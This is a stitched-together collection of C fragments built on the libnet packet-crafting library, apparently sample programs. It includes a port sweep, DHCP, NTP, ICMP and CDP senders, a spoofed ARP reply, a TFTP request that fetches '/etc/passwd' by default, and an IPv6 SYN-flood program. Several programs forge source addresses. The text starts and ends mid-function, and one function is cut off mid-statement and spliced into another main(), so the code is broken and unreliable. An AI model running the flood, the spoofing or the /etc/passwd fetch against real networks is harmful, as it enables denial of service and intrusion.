ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ethernet == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build ethernet header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build ethernet header: %s.\n", libnet_geterror(libnet_c));
}
else
{
if (libnet_write(libnet_c) == -1)
{
if (config.daemon)
syslog(LOG_ERR, "write error: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Write error: %s.\n", libnet_geterror(libnet_c));
}
}
}
}
libnet_clear_packet(libnet_c);
}
}
int
main(int argc, char **argv)
{
int c, build_ip;
struct timeval r;
struct timeval s;
struct timeval e;
libnet_t *l;
libnet_ptag_t udp;
char *payload;
libnet_ptag_t t;
struct libnet_stats ls;
u_short payload_s;
u_long src_ip, dst_ip;
u_short bport, eport, cport;
libnet_plist_t plist, *plist_p;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1.0 packet shaping: UDP2[link]\n");
l = libnet_init(
LIBNET_LINK, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
payload = NULL;
payload_s = 0;
plist_p = NULL;
while ((c = getopt(argc, argv, "d:s:p:P:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
case 'P':
plist_p = &plist;
if (libnet_plist_chain_new(l, &plist_p, optarg) == -1)
{
fprintf(stderr, "Bad token in port list: %s\n",
libnet_geterror(l));
exit(1);
}
break;
case 'p':
payload = optarg;
payload_s = strlen(payload);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip || !plist_p)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
udp = 0;
#if !(__WIN32__)
gettimeofday(&s, NULL);
#else
/* This obviously is not as good - but it compiles now. */
s.tv_sec = time(NULL);
s.tv_usec = 0;
#endif
build_ip = 1;
while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
{
while (!(bport > eport) && bport != 0)
{
cport = bport++;
udp = libnet_build_udp(
1025, /* source port */
cport, /* destination port */
LIBNET_UDP_H + payload_s, /* packet size */
0, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
udp); /* libnet id */
if (udp == -1)
{
fprintf(stderr, "Can't build UDP header (at port %d): %s\n",
cport, libnet_geterror(l));
goto bad;
}
if (build_ip)
{
build_ip = 0;
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
enet_dst, /* ethernet destination */
enet_src, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
}
//usleep(100);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "write error: %s\n", libnet_geterror(l));
}
else
{
fprintf(stderr, "wrote %d UDP packet to port %d\n", c, cport);
// fprintf(stderr, ".");
}
}
}
#if !(__WIN32__)
gettimeofday(&s, NULL);
#else
/* This obviously is not as good - but it compiles now. */
s.tv_sec = time(NULL);
s.tv_usec = 0;
#endif
libnet_timersub(&e, &s, &r);
fprintf(stderr, "Total time spent in loop: %ld.%ld\n", r.tv_sec, r.tv_usec);
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
void anubis_dump_libnet_content(libnet_t *handle, int transport_layer, int is_application_layer) {
int c;
uint32_t len = 0;
uint8_t *content = NULL;
uint32_t dump_len = 0;
c = libnet_pblock_coalesce(handle, &content, &len);
if (c == - 1) {
anubis_err("libnet_pblock_coalesce(): %s\n", libnet_geterror(handle));
return;
}//end if
//libnet_diag_dump_hex(content, len, 0, out_stream);
//return;
if(!transport_layer) {
if(handle->injection_type == LIBNET_LINK)
anubis_dump_ethernet(&dump_len, len, content);
else if(handle->injection_type == LIBNET_RAW4)
anubis_dump_ip(&dump_len, len, (struct libnet_ipv4_hdr *)content, 0);
}//end if
else {
struct libnet_ipv4_hdr *ip = (struct libnet_ipv4_hdr *)content;
dump_len += ip->ip_hl << 2;
char *p = (char *)ip + (ip->ip_hl << 2);
switch (ip->ip_p) {
case IPPROTO_UDP:
if(is_application_layer) {
dump_len += LIBNET_UDP_H;
}
else {
anubis_dump_udp(&dump_len, len, (struct libnet_udp_hdr *)p);
}
break;
case IPPROTO_TCP:
if(is_application_layer) {
dump_len += ((struct libnet_tcp_hdr *)p)->th_off << 2;
}
else {
anubis_dump_tcp(&dump_len, len, (struct libnet_tcp_hdr *)p);
}//end if
break;
case IPPROTO_ICMP:
if(is_application_layer) {
anubis_err("TUTU: Sorry, I am lazy\n");
}//end if
anubis_dump_icmp(&dump_len, len, (anubis_icmp_t *)p);
break;
default:
fprintf(out_stream, "Next protocol: %d\n", ip->ip_p);
break;
}//end switch
}//end else if transport
//remain data
if(len > dump_len)
anubis_dump_payload(len - dump_len, len, content + dump_len);
fprintf(out_stream, "[EOP]\n\n");
#ifndef __CYGWIN__
//free
if (handle->aligner > 0) {
content = content - handle->aligner;
}//end if
free(content);
#endif
fflush(out_stream);
}//end anubis_dump_libnet_content
int
main(int argc, char *argv[])
{
char *intf;
u_long src_ip, options_len, orig_len;
int i;
libnet_t *l;
libnet_ptag_t t;
libnet_ptag_t ip;
libnet_ptag_t udp;
libnet_ptag_t dhcp;
struct libnet_ether_addr *ethaddr;
struct libnet_stats ls;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char options_req[] = { LIBNET_DHCP_SUBNETMASK , LIBNET_DHCP_BROADCASTADDR , LIBNET_DHCP_TIMEOFFSET , LIBNET_DHCP_ROUTER , LIBNET_DHCP_DOMAINNAME , LIBNET_DHCP_DNS , LIBNET_DHCP_HOSTNAME };
u_char *options;
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
u_char *tmp;
// have to specify interface
if (argc != 2)
usage(argv[0]);
intf = argv[1];
l = libnet_init(
LIBNET_LINK, // injection type
intf, // network interface
errbuf); // errbuf
if (!l)
{
fprintf(stderr, "libnet_init: %s", errbuf);
exit(EXIT_FAILURE);
}
else {
src_ip = libnet_get_ipaddr4(l);;
if ((ethaddr = libnet_get_hwaddr(l)) == NULL)
{
fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
printf("ip addr : %s\n", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE));
printf("eth addr : ");
for (i = 0; i < 6; i++) {
printf("%x", ethaddr->ether_addr_octet[i]);
if (i != 5) {
printf(":");
}
}
printf("\n");
// build options packet
i = 0;
options_len = 3; // update total payload size
// we are a discover packet
options = malloc(3);
options[i++] = LIBNET_DHCP_MESSAGETYPE; // type
options[i++] = 1; // len
options[i++] = LIBNET_DHCP_MSGDISCOVER; // data
orig_len = options_len;
options_len += sizeof(options_req) + 2; // update total payload size
// workaround for realloc on old machines
// options = realloc(options, options_len); // resize options buffer
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
// we are going to request some parameters
options[i++] = LIBNET_DHCP_PARAMREQUEST; // type
options[i++] = sizeof(options_req); // len
memcpy(options + i, options_req, sizeof(options_req)); // data
i += sizeof(options_req);
// if we have an ip already, let's request it.
if (src_ip)
{
orig_len = options_len;
options_len += 2 + sizeof(src_ip);
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
options[i++] = LIBNET_DHCP_DISCOVERADDR; // type
options[i++] = sizeof(src_ip); // len
memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data
i += sizeof(src_ip);
}
// end our options packet
options[i] = LIBNET_DHCP_END;
// make sure we are at least the minimum length, if not fill
// this could go in libnet, but we will leave it in the app for now
if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN)
{
orig_len = options_len;
options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H;
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
memset(options + i, 0, options_len - i);
}
// the goodies are here
dhcp = libnet_build_dhcpv4(
LIBNET_DHCP_REQUEST, // opcode
1, // hardware type
6, // hardware address length
0, // hop count
0xdeadbeef, // transaction id
0, // seconds since bootstrap
0x8000, // flags
0, // client ip
0, // your ip
0, // server ip
0, // gateway ip
ethaddr->ether_addr_octet, // client hardware addr
NULL, // server host name
NULL, // boot file
options, // dhcp options stuck in payload since it is dynamic
options_len, // length of options
l, // libnet handle
0); // libnet id
// wrap it
udp = libnet_build_udp(
68, // source port
67, // destination port
LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // packet size
0, // checksum
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// hook me up with some ipv4
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H
+ options_len, // length
0x10, // TOS
0, // IP ID
0, // IP Frag
16, // TTL
IPPROTO_UDP, // protocol
0, // checksum
src_ip, // src ip
inet_addr("255.255.255.255"), // destination ip
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// we can just autobuild since we arent doing anything tricky
t = libnet_autobuild_ethernet(
enet_dst, // ethernet destination
ETHERTYPE_IP, // protocol type
l); // libnet handle
// write to the wire
if (libnet_write(l) == -1)
{
fprintf(stderr, " %s: libnet_write: %s\n", argv[0],
strerror(errno));
exit(EXIT_FAILURE);
}
// fill and print stats
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
// free mem
free(options);
exit(0);
}
exit(0);
}
int
main(int argc, char **argv)
{
int c;
libnet_t *l;
u_long dst_ip;
libnet_ptag_t t;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 NTP packet shaping[raw -- autobuilding IP]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
dst_ip = 0;
while((c = getopt(argc, argv, "d:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
}
}
if (!dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Build the packet, remmebering that order IS important. We must
* build the packet from lowest protocol type on up as it would
* appear on the wire. So for our NTP packet:
*
* --------------------------------------------------------------------
* | IP | UDP | NTP |
* --------------------------------------------------------------------
* ^ ^ ^
* |-------------- | |
* libnet_build_ipv4()--| | |
* | |
* libnet_build_udp()-------| |
* |
* libnet_build_ntp()------------------------------|
*/
t = libnet_build_ntp(
LIBNET_NTP_LI_AC, /* leap indicator */
LIBNET_NTP_VN_4, /* version */
LIBNET_NTP_MODE_S, /* mode */
LIBNET_NTP_STRATUM_PRIMARY, /* stratum */
4, /* poll interval */
1, /* precision */
0xffff, /* delay interval */
0xffff, /* delay fraction */
0xffff, /* dispersion interval */
0xffff, /* dispersion fraction */
LIBNET_NTP_REF_PPS, /* reference id */
0x11, /* reference ts int */
0x22, /* reference ts frac */
0x33, /* originate ts int */
0x44, /* originate ts frac */
0x55, /* receive ts int */
0x66, /* receive ts frac */
0x77, /* transmit ts interval */
0x88, /* transmit ts fraction */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build NTP header: %s\n", libnet_geterror(l));
goto bad;
}
libnet_seed_prand(l);
t = libnet_build_udp(
libnet_get_prand(LIBNET_PRu16), /* source port */
123, /* NTP port */
LIBNET_UDP_H + LIBNET_NTP_H, /* UDP packet length */
0, /* checksum */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_autobuild_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_NTP_H,/* packet length */
IPPROTO_UDP,
dst_ip,
l);
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
fprintf(stderr, "l contains a %d byte packet\n", libnet_getpacket_size(l));
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte NTP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int libnet_gen_l2_packet(struct packet_desc *packet_vars, libnet_t *l) {
libnet_ptag_t t;
char *payload;
u_short payload_s;
u_char *cp, oui[3];
u_short priority, cfi;
u_short frame_type;
int is_llc_snap, is_arp, is_802_3;
u_short len_proto;
/* TMP CODE ONLY TO TEST OTHER LAYERS */
if (packet_vars->l2_pkt_type == 0) {
printf("***TEST PROGRAM ERROR !! \n");
return(-1);
}
is_llc_snap = is_arp = is_802_3 = 0;
payload = NULL;
payload_s = 0;
if (packet_vars->l2_len) {
payload = genPayload(packet_vars->payload.data_type,
packet_vars->payload.data_seed,
packet_vars->l2_len);
payload_s = packet_vars->l2_len;
} else {
payload = NULL;
payload_s = 0;
}
frame_type = 0;
if (packet_vars->l3_pkt_type) {
if (packet_vars->l3_pkt_type & L3_PKT_TYPE_IPV4) {
frame_type = ETHERTYPE_IP;
} else if (packet_vars->l3_pkt_type & L3_PKT_TYPE_IPV6) {
frame_type = ETHERTYPE_IPV6;
} else {
frame_type = 0;
}
printf("L3 protocol chosen - %x\n", frame_type);
} else if (packet_vars->l2_pkt_type & L2_PKT_TYPE_ARP) {
frame_type = ETHERTYPE_ARP;
} else if (packet_vars->l2_pkt_type & L2_PKT_TYPE_RARP) {
frame_type = ETHERTYPE_REVARP;
#if 0 /* Needs to be implemented to support user defined frame types */
} else if (packet_vars->ether.proto) {
frame_type = packet_vars->ether.proto;
#endif
} else {
is_802_3 = 1;
}
if ((packet_vars->l2_pkt_type & L2_PKT_TYPE_ARP) ||
(packet_vars->l2_pkt_type & L2_PKT_TYPE_RARP)) {
printf("---Generating ARP/RARP header \n");
t = libnet_build_arp(packet_vars->arp.hw_type,
packet_vars->arp.proto_type,
packet_vars->arp.hw_len,
packet_vars->arp.proto_len,
packet_vars->arp.op_code,
packet_vars->arp.src_ha,
packet_vars->arp.src_ip,
packet_vars->arp.tgt_ha,
packet_vars->arp.tgt_ip,
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1) {
fprintf(stderr, "***Can't build ARP header: %s\n",
libnet_geterror(l));
return (NULL);
}
payload = NULL;
payload_s = 0;
is_arp = 1;
}
if (packet_vars->l2_pkt_type & L2_PKT_TYPE_LLCSNAP) {
memset(&oui, 0, 3);
printf("---Generating LLC header \n");
t = libnet_build_802_2snap (
0xaa, /* SNAP DSAP */
0xaa, /* SNAP SSAP */
0x3, /* control */
oui, /* oui */
frame_type, /* protocol */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1) {
fprintf(stderr, "***Can't build LLC SNAP header: "
"%s\n", libnet_geterror(l));
return(NULL);
}
payload = NULL;
payload_s = 0;
is_llc_snap = 1;
}
if(packet_vars->payload.error_code & PG_TYPE_LEN_USER_MODE) {
len_proto = (packet_vars->payload.error_data & 0xffff0000)>>16;
}else if(packet_vars->payload.error_code & PG_TYPE_LEN_ERR) {
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t udp = 0, ip = 0;
char *filename = "/etc/passwd";
char mode[] = "netascii";
u_char *payload = NULL;
uint32_t payload_s = 0;
printf("libnet 1.1 packet shaping: UDP + payload[raw] == TFTP\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
goto bad;
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
goto bad;
}
break;
case 'p':
filename = optarg;
break;
default:
fprintf(stderr, "unkown option [%s]: bye bye\n", optarg);
goto bad;
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* build payload
*
* 2 bytes string 1 byte string 1 byte
* ------------------------------------------------
* | Opcode | Filename | 0 | Mode | 0 |
* ------------------------------------------------
*
*/
payload_s = 2 + strlen(filename) + 1 + strlen(mode) + 1;
payload = malloc(sizeof(char)*payload_s);
if (!payload)
{
fprintf(stderr, "malloc error for payload\n");
goto bad;
}
memset(payload, 0, payload_s);
payload[1] = 1; /* opcode - GET */
memcpy(payload + 2, filename, strlen(filename));
memcpy(payload + 2 + strlen(filename) + 1 , mode, strlen(mode));
/*
* Build pblocks
*/
udp = libnet_build_udp(
0x1234, /* source port */
69, /* destination port */
LIBNET_UDP_H + payload_s, /* packet length */
0, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (udp == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length - dont forget the UDP's payload */
0, /* TOS */
0x4242, /* IP ID */
0, /* IP Frag */
0x42, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload (already in UDP) */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TFTP packet; check the wire.\n", c);
}
libnet_destroy(l);
free(payload);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
free(payload);
return (EXIT_FAILURE);
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id, seq;
int i;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating a random id */
libnet_seed_prand(l);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* Getting destination IP address */
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if ( ip_addr == -1 ) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing 4 packets */
seq = 1;
for ( i = 0; i < 4; i++ ) {
/* Building the ICMP header */
if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
(seq + i), NULL, 0, l, 0) == -1 ) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building the IP header */
if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\
ip_addr, l) == -1 ) {
fprintf(stderr, "Error building IP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
if ( libnet_write(l) == -1 )
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
/* Clearing the packet */
/* Comment this to see what happens when you rebuild headers
* without calling libnet_clear_packet() */
libnet_clear_packet(l);
/* Waiting 1 second between each packet */
sleep(1);
}
libnet_destroy(l);
return 0;
}
int
main(int argc, char *argv[])
{
int c;
uint32_t i;
libnet_t *l;
libnet_ptag_t t;
char *device = NULL;
uint8_t *packet;
uint32_t packet_s;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: ARP[link -- autobuilding ethernet]\n");
if (argc > 1)
{
device = argv[1];
}
l = libnet_init(
LIBNET_LINK_ADV, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "%s", errbuf);
exit(EXIT_FAILURE);
}
else
/*
* Build the packet, remmebering that order IS important. We must
* build the packet from lowest protocol type on up as it would
* appear on the wire. So for our ARP packet:
*
* -------------------------------------------
* | Ethernet | ARP |
* -------------------------------------------
* ^ ^
* |------------------ |
* libnet_build_ethernet()--| |
* |
* libnet_build_arp()-----------|
*/
i = libnet_get_ipaddr4(l);
t = libnet_autobuild_arp(
ARPOP_REPLY, /* operation type */
enet_src, /* sender hardware addr */
(uint8_t *)&i, /* sender protocol addr */
enet_dst, /* target hardware addr */
(uint8_t *)&i, /* target protocol addr */
l); /* libnet context */
if (t == -1)
{
fprintf(stderr, "Can't build ARP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_autobuild_ethernet(
enet_dst, /* ethernet destination */
ETHERTYPE_ARP, /* protocol type */
l); /* libnet handle */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n",
libnet_geterror(l));
goto bad;
}
if (libnet_adv_cull_packet(l, &packet, &packet_s) == -1)
{
fprintf(stderr, "%s", libnet_geterror(l));
}
else
{
fprintf(stderr, "packet size: %d\n", packet_s);
libnet_adv_free_packet(l, packet);
}
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte ARP packet from context \"%s\"; "
"check the wire.\n", c, libnet_cq_getlabel(l));
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char **argv)
{
struct libnet_in6_addr dst_ip;
struct libnet_in6_addr src_ip;
u_short dst_prt = 0;
u_short src_prt = 0;
libnet_t *l;
libnet_ptag_t t;
char *cp;
char errbuf[LIBNET_ERRBUF_SIZE];
int i, c, packet_amt, burst_int, burst_amt, build_ip;
char srcname[100],dstname[100];
packet_amt = 0;
burst_int = 0;
burst_amt = 1;
printf("libnet 1.1 syn flooding: TCP6[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW6, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
{
switch (c)
{
case 't':
if (!(cp = strrchr(optarg, '/')))
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
dst_ip = libnet_name2addr6(l, optarg, 1);
if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0)
{
fprintf(stderr, "Bad IP6 address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'a':
packet_amt = atoi(optarg);
break;
case 'i':
burst_int = atoi(optarg);
break;
case 'b':
burst_amt = atoi(optarg);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE);
/*src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE);
dst_prt = 113;
dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE);
packet_amt = 1;*/
if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname));
libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname));
for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;)
{
for (i = 0; i < packet_amt; i++)
{
char payload[56];
int i;
for (i=0; i<56; i++) payload[i]='A'+((char)(i%26));
t = libnet_build_tcp(
src_prt = libnet_get_prand(LIBNET_PRu16),
dst_prt,
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
TH_SYN,
libnet_get_prand(LIBNET_PRu16),
0,
0,
LIBNET_TCP_H,
NULL,
0,
l,
t);
if (build_ip)
{
build_ip = 0;
printf("Packet len = %ld\n",LIBNET_ICMPV6_H+sizeof(payload));
libnet_build_ipv6(0,0,
LIBNET_TCP_H,
IPPROTO_TCP,
64,
src_ip,
dst_ip,
NULL,
0,
l,
0);
}
printf("%15s/%5d -> %15s/%5d\n",
srcname,
ntohs(src_prt),
dstname,
dst_prt);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
}
#if !(__WIN32__)
usleep(250);
#else
Sleep(250);
#endif
}
#if !(__WIN32__)
sleep(burst_int);
#else
Sleep(burst_int * 1000);
#endif
}
exit(EXIT_SUCCESS);
}
int
main(int argc, char *argv[])
{
int c, len;
libnet_t *l;
libnet_ptag_t t;
u_char *value;
u_char values[100];
u_short tmp;
u_long tmp2;
char *device = NULL;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: CDP[link]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
value = "switch";
len = strlen(value);
t = libnet_build_cdp(
1, /* version */
30, /* time to live */
0, /* checksum */
LIBNET_CDP_DEVID, /* type */
len, /* length */
value, /* value */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build CDP header: %s\n", libnet_geterror(l));
goto bad;
}
memset(values, 0, sizeof(values));
tmp = htons(LIBNET_CDP_PORTID);
memcpy(values, &tmp, 2);
tmp = htons(0x0014);
memcpy(values + 2, &tmp, 2);
memcpy(values + 4, (u_char *)"FastEthernet0/20", 16);
t = libnet_build_data(
values,
20,
l,
0);
if (t == -1)
{
fprintf(stderr, "Can't build CDP data: %s\n", libnet_geterror(l));
goto bad;
}
memset(values, 0, sizeof(values));
tmp = htons(LIBNET_CDP_CAPABIL);
memcpy(values, &tmp, 2);
tmp = htons(0x0008);
memcpy(values + 2, &tmp, 2);
tmp2 = htonl((LIBNET_CDP_CAP_L2S | LIBNET_CDP_CAP_L2B));
memcpy(values + 4, &tmp2, 4);
t = libnet_build_data(
values,
8,
l,
0);
if (t == -1)
{
fprintf(stderr, "Can't build CDP data: %s\n", libnet_geterror(l));
goto bad;
}
memset(values, 0, sizeof(values));
tmp = htons(LIBNET_CDP_VERSION);
memcpy(values, &tmp, 2);
tmp = htons(0x001f);
memcpy(values + 2, &tmp, 2);
memcpy(values + 4, (u_char *)"ABCDEFGHIJKLMNOPQRSTUVWXYZ", 26);
t = libnet_build_data(
values,
31,
l,
0);
if (t == -1)
{
fprintf(stderr, "Can't build CDP data: %s\n", libnet_geterror(l));
goto bad;
}
memset(values, 0, sizeof(values));
tmp = htons(LIBNET_CDP_PLATFORM);
memcpy(values, &tmp, 2);
tmp = htons(0x0015);
memcpy(values + 2, &tmp, 2);
memcpy(values + 4, (u_char *)"cisco WS-C2924-XL", 17);
